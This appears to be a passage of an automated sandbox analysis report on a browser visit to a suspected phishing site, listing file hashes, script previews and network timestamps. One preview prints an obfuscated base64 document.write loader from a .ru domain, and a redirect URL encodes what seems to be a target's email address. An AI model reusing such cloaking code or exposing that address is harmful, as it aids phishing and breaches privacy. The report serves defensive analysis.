                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.78, 64.233.164.84, 172.217.17.46, 217.20.58.99, 192.229.221.95, 172.217.17.35, 51.105.104.217, 2.20.41.218, 23.218.208.109, 172.202.163.200, 13.107.246.63
                                                            • Excluded domains from analysis (whitelisted): odwebp.trafficmanager.net, odc-web-brs.onedrive.akadns.net, fs.microsoft.com, accounts.google.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, otelrules.azureedge.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, cosmic-westeurope-ns-cbf6e4cb41a8.trafficmanager.net, www.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            No simulations
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):48316
                                                            Entropy (8bit):5.6346993394709
                                                            Encrypted:false
                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (62639), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):69446
                                                            Entropy (8bit):5.258960326571494
                                                            Encrypted:false
                                                            SSDEEP:1536:RTnqTgc36+6f6LRywaVX8UBGwjqUR/rkw:RTqTg7y5aVMUjjDlT
                                                            MD5:B39625AD71473F76A65ABE4961E8A883
                                                            SHA1:F334D080645C3E5F0239CD2819494F0FCC997158
                                                            SHA-256:66CA743C8AA5134B71701A960F1A7B9782E63117FA6234FCE13A561769946531
                                                            SHA-512:2CCD4EE48E852DDEB613923DCFF7C80095A6BC39340931F604C257FD5A04C7B300FFF742069AA065FA25492545EFF3F8FBCD2C881299FDAC90FB5DB3FE31B8C2
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:http://primer-distrito-amvt.org/.r/7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==
                                                            Preview:......<!DOCTYPE html>..<html>..<head>.. .. <meta name="description" content="Apples are one of the most popular fruits in the world, and for good reason. They are delicious, nutritious, and versatile. This article will provide you with everything you need to know about apples, including their history, types, health benefits, and how to eat them." />..</head>..<body>.. <div id="s63hd" style="display:none">.. <h1>Apples: A Comprehensive Guide</h1>.... <p>Apples are one of the most popular fruits in the world, and for good reason. They are delicious, nutritious, and versatile. Apples can be eaten fresh, cooked, or baked, and they are used in a wide variety of dishes.</p>.... <section id="history">.. <h2>History of apples</h2>.... <p>Apples have been cultivated for thousands of years. The earliest evidence of apple cultivation dates back to Central Asia, where apples were grown around 6500 BC. Apples were eventually introduced to Europe and North America, an
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:dropped
                                                            Size (bytes):89501
                                                            Entropy (8bit):5.289893677458563
                                                            Encrypted:false
                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:downloaded
                                                            Size (bytes):89501
                                                            Entropy (8bit):5.289893677458563
                                                            Encrypted:false
                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (7497), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):19912
                                                            Entropy (8bit):5.881130553353419
                                                            Encrypted:false
                                                            SSDEEP:384:ynurbObZ5ZxbghkiQW3Za+Fl/f/fbfvZVDnurbObZ5ZxbghkiQW3Za+Fl/f/fbfi:sV5Zuhki33ZnHrdV5Zuhki33ZnHalrm+
                                                            MD5:BCCB27DB0A76FA69C1AD61A09FE0C643
                                                            SHA1:E3FF733A6966008D0D445AC9EC932D69547A213C
                                                            SHA-256:E36194C5CAE4062FDE357019CF86BA7834FF637403B222A0E75893AF5020CD37
                                                            SHA-512:A574CFD7528D75D309C5D4614AFEAEC80968F9B8BA1FBAD6D2798CD52A7E5825A0448ADEB08717D84E12705AF38AFDD57637FFD9BCF18959AB81DD6F665B1852
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://galaxy.zofilane.ru/pD0JM2s/
                                                            Preview: Success is not the key to happiness. Happiness is the key to success. -->..<script>....if(atob("aHR0cHM6Ly9jVDQuem9maWxhbmUucnUvcEQwSk0ycy8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogI
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (47691)
                                                            Category:downloaded
                                                            Size (bytes):47692
                                                            Entropy (8bit):5.401573598696506
                                                            Encrypted:false
                                                            SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                            MD5:B0B3774E70E752266B4CF190E6D95053
                                                            SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                            SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                            SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.js
                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (47691)
                                                            Category:dropped
                                                            Size (bytes):47692
                                                            Entropy (8bit):5.401573598696506
                                                            Encrypted:false
                                                            SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                            MD5:B0B3774E70E752266B4CF190E6D95053
                                                            SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                            SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                            SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):452
                                                            Entropy (8bit):7.0936408308765495
                                                            Encrypted:false
                                                            SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                                            MD5:C33DE66281E933259772399D10A6AFE8
                                                            SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                                            SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                                            SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 55 x 26, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):4.035372245524405
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPlilt/j5clpAkxl/k4E08up:6v/lhPeaAk7Tp
                                                            MD5:212A066B7618BC3D3DB0BC26032C392E
                                                            SHA1:A30E9A08FD160A28A72196E7ADAC9BB7B4506560
                                                            SHA-256:4AA0DF0FA2C32721C952489AECCAECEB466F2FBE89FDF8E00F208253DF0138F2
                                                            SHA-512:BE29B274BB2409DD34FAE75F44B5AEA639C5853C04038394A9DAA5EBE7FBAE6E860EE8513875B6550DF21892F3481802F823B73A1D63C77F5F1658935BD5FAF0
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...7...........S.....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 55 x 26, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):4.035372245524405
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPlilt/j5clpAkxl/k4E08up:6v/lhPeaAk7Tp
                                                            MD5:212A066B7618BC3D3DB0BC26032C392E
                                                            SHA1:A30E9A08FD160A28A72196E7ADAC9BB7B4506560
                                                            SHA-256:4AA0DF0FA2C32721C952489AECCAECEB466F2FBE89FDF8E00F208253DF0138F2
                                                            SHA-512:BE29B274BB2409DD34FAE75F44B5AEA639C5853C04038394A9DAA5EBE7FBAE6E860EE8513875B6550DF21892F3481802F823B73A1D63C77F5F1658935BD5FAF0
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8f1d10088a7d4314/1734167450211/C0KkzdsRP1tlIpN
                                                            Preview:.PNG........IHDR...7...........S.....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):48316
                                                            Entropy (8bit):5.6346993394709
                                                            Encrypted:false
                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):452
                                                            Entropy (8bit):7.0936408308765495
                                                            Encrypted:false
                                                            SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                                            MD5:C33DE66281E933259772399D10A6AFE8
                                                            SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                                            SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                                            SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://galaxy.zofilane.ru/cdn-cgi/images/icon-exclamation.png?1376755637
                                                            Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:1
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:very short file (no magic)
                                                            Category:downloaded
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru/iiuxxyogslrdbqfxkhhhdftmfCAaOSYTIOIATZALRRJPJGMDGANITHJNUOOWODNCP
                                                            Preview:1
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (24050)
                                                            Category:downloaded
                                                            Size (bytes):24051
                                                            Entropy (8bit):4.941039417164537
                                                            Encrypted:false
                                                            SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                                            MD5:5E8C69A459A691B5D1B9BE442332C87D
                                                            SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                                            SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                                            SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://galaxy.zofilane.ru/cdn-cgi/styles/cf.errors.css
                                                            Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            No static file info
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 14, 2024 10:09:59.755862951 CET49675443192.168.2.4173.222.162.32
                                                            Dec 14, 2024 10:10:02.897097111 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:02.897181988 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:02.897259951 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:02.897470951 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:02.897496939 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:04.624325037 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:04.624624968 CET49738443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:10:04.624689102 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:04.626147032 CET44349738142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:10:04.626220942 CET49738443192.168.2.4142.250.181.132
